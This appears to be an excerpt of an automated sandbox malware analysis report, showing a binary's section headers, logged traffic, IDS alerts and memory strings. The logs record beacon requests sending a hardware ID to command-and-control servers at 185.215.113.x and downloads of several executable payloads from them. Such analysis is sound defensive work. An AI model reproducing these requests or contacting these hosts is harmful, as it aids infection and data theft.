00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 64 74 76 77 61 6b 66 00 e0 2b 00 00 a0 00 00 00 ce 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 6a 6d 69 68 75 61 76 00 20 00 00 00 80 2c 00 00 06 00 00 00 08 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2c 00 00 22 00 00 00 0e 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 33 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013536001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013537001&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFBGIJKEGIECAAFHDHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 37 41 33 30 41 32 43 37 41 35 31 39 31 35 33 33 34 32 33 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 2d 2d 0d 0a Data Ascii: ------HDAFBGIJKEGIECAAFHDHContent-Disposition: form-data; name="hwid"9D7A30A2C7A51915334237------HDAFBGIJKEGIECAAFHDHContent-Disposition: form-data; name="build"stok------HDAFBGIJKEGIECAAFHDH--
                          Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 33 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013538001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 33 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013539001&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJKKJJDAAAAAKFHJJDGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 37 41 33 30 41 32 43 37 41 35 31 39 31 35 33 33 34 32 33 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="hwid"9D7A30A2C7A51915334237------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="build"stok------IJJKKJJDAAAAAKFHJJDG--
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                          Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                          Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Joe Sandbox ViewJA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49770 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49790 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49781 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49791 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49800 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49814 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49815 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49827 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49821 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49833 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49834 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49842 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49838 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49806 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49852 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49861 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49864 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49868 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49897 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49906 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49880 -> 104.21.48.1:443
                          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EE0C0 recv,recv,recv,recv,0_2_009EE0C0
                          Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: )) OVER (PARTITION BY fixup_url(host)) > 0https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: )) OVER (PARTITION BY fixup_url(host)) > 0https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://web-assets.toggl.com/app/assets/scripts/*.js*://pub.doubleverify.com/signals/pub.js**://connect.facebook.net/*/sdk.js**://www.everestjs.net/static/st.v3.js**://libs.coremetrics.com/eluminate.jspictureinpicture%40mozilla.org:1.0.0*://auth.9c9media.ca/auth/main.jsFileUtils_closeSafeFileOutputStream@mozilla.org/network/safe-file-output-stream;1webcompat-reporter%40mozilla.org:1.5.1https://smartblock.firefox.etp/facebook.svghttps://smartblock.firefox.etp/play.svgFileUtils_closeAtomicFileOutputStream*://c.amazon-adsystem.com/aax2/apstag.js*://static.chartbeat.com/js/chartbeat.js*://static.chartbeat.com/js/chartbeat_video.jsFileUtils_openAtomicFileOutputStream*://static.criteo.net/js/ld/publishertag.js*://*.imgur.com/js/vendor.*.bundle.js*://www.rva311.com/static/js/main.*.chunk.js*://connect.facebook.net/*/all.js*@mozilla.org/network/atomic-file-output-stream;1FileUtils_openSafeFileOutputStream*://cdn.branch.io/branch-latest.min.js*resource://gre/modules/addons/XPIProvider.jsm*://www.googletagmanager.com/gtm.js**://www.google-analytics.com/plugins/ua/ec.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://www.google-analytics.com/analytics.js**://www.googletagservices.com/tag/js/gpt.js**://cdn.adsafeprotected.com/iasPET.1.js*://pagead2.googlesyndication.com/tag/js/gpt.js**://*.moatads.com/*/moatheader.js**://cdn.optimizely.com/public/*.js*://ssl.google-analytics.com/ga.js*://s0.2mdn.net/instream/html5/ima3.js*://www.google-analytics.com/gtm/js**://static.adsafeprotected.com/iasPET.1.js*://adservex.media.net/videoAds.js**://*.vidible.tv/*/vidible-min.js**://s.webtrends.com/js/advancedLinkTracking.js*://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://s.webtrends.com/js/webtrends.js*://s.webtrends.com/